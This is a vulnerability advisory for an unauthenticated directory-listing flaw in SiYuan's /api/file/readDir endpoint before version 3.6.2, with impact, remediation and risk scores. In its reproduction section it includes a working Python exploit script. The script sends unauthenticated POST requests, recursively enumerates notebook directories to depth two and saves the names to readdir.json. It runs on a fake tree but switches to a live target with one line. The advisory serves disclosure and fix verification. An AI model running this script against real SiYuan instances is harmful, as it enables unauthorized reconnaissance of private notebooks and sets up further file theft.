SiYuan Personal Knowledge Management System Directory Traversal Vulnerability

Vulnerability

A directory traversal vulnerability has been identified in SiYuan, a personal knowledge management system, in versions prior to 3.6.2. The vulnerability exists in the '/api/file/readDir' interface, which can be abused to traverse directories and retrieve the names of all documents within a notebook. This issue has been patched in version 3.6.2.

Impact

Exploitation of this vulnerability allows an attacker to traverse directories without authorization and enumerate the entire directory structure of a notebook, including document names. On its own the endpoint discloses names and layout rather than document contents; combined with a separate file-reading vulnerability, however, it supplies the exact paths needed to read arbitrary documents.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/api/file/readDir' endpoint without authentication. The request body is a JSON object specifying the path to list. The response contains the directory entries for that path; subdirectories in the response can be explored recursively up to a depth of two. The file and folder names collected this way can be saved to a 'readdir.json' file.
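The reproduction above, written out as a script. This is an added example, not code from the advisory or from the SiYuan project. It assumes the request and response shape documented in SiYuan's own API reference (a `{"path": ...}` body answered by `{"code": 0, "data": [{"name": ..., "isDir": ...}, ...]}`); the starting path `/data/notebook` and the directory tree in `FAKE_TREE` are constructed stand-ins so the script runs offline, and `http_fetcher` is the part that talks to a live instance.

```python
"""Walk SiYuan's /api/file/readDir to a depth of two and dump entry names.

Added example; not the project's own code. Request/response shape is
assumed from SiYuan's published API reference.
"""
import json
import urllib.request
from typing import Callable, Dict, List

# A fetcher maps a directory path to the list of entry dicts the API returns.
Fetcher = Callable[[str], List[dict]]

MAX_DEPTH = 2  # the advisory's reproduction descends two levels


def http_fetcher(base_url: str, token: str = "") -> Fetcher:
    """Build a fetcher that POSTs to /api/file/readDir on a live instance.

    No Authorization header is sent unless a token is given: per the advisory,
    affected versions answered this endpoint without authentication.
    """
    def fetch(path: str) -> List[dict]:
        body = json.dumps({"path": path}).encode()
        req = urllib.request.Request(
            base_url.rstrip("/") + "/api/file/readDir",
            data=body,
            headers={"Content-Type": "application/json"},
            method="POST",
        )
        if token:
            req.add_header("Authorization", "Token " + token)
        with urllib.request.urlopen(req, timeout=10) as resp:
            reply = json.load(resp)
        if reply.get("code") != 0:
            raise RuntimeError(f"readDir {path!r} failed: {reply.get('msg')}")
        return reply.get("data") or []
    return fetch


def walk(fetch: Fetcher, path: str, depth: int = MAX_DEPTH) -> Dict[str, list]:
    """List `path` and descend into subdirectories up to `depth` levels.

    Returns {directory_path: [entry names]} for every directory visited.
    """
    listing: Dict[str, list] = {}
    entries = fetch(path)
    listing[path] = [e["name"] for e in entries]
    if depth <= 0:
        return listing
    for e in entries:
        if e.get("isDir"):
            child = path.rstrip("/") + "/" + e["name"]
            listing.update(walk(fetch, child, depth - 1))
    return listing


def to_readdir_json(listing: Dict[str, list]) -> str:
    """Serialise the collected names in the form written to readdir.json."""
    return json.dumps(listing, indent=2, sort_keys=True)


# Constructed tree standing in for a live instance (assumption, offline demo).
# Four levels deep so the depth limit is visible: "deepest" is never listed.
FAKE_TREE = {
    "/data/notebook": [
        {"name": "docA.sy", "isDir": False},
        {"name": "sub", "isDir": True},
    ],
    "/data/notebook/sub": [
        {"name": "docB.sy", "isDir": False},
        {"name": "deeper", "isDir": True},
    ],
    "/data/notebook/sub/deeper": [
        {"name": "docC.sy", "isDir": False},
        {"name": "deepest", "isDir": True},
    ],
    "/data/notebook/sub/deeper/deepest": [
        {"name": "docD.sy", "isDir": False},
    ],
}


def fake_fetcher(path: str) -> List[dict]:
    """Offline fetcher answering from FAKE_TREE instead of the network."""
    return FAKE_TREE.get(path, [])


if __name__ == "__main__":
    # Swap fake_fetcher for http_fetcher("http://127.0.0.1:6806") on a live target.
    result = walk(fake_fetcher, "/data/notebook")
    with open("readdir.json", "w", encoding="utf-8") as fh:
        fh.write(to_readdir_json(result))
```

Against the constructed tree the walk visits the root and two levels below it and stops there, so `docD.sy` never appears in the output. To verify a fix, run the same walk against a 3.6.2 or later instance with no token and confirm the request is rejected rather than answered with a listing.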

Remediation

Users are advised to update to SiYuan version 3.6.2 or later.

Added: Mar 26, 2026, 10:30 PM
Updated: Mar 26, 2026, 10:30 PM

Vulnerability Rating

Custom Algorithm
spread: 0.3
impact: 0.6
exploitability: 9.1
remediation: 7.7
relevance: 4.7
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.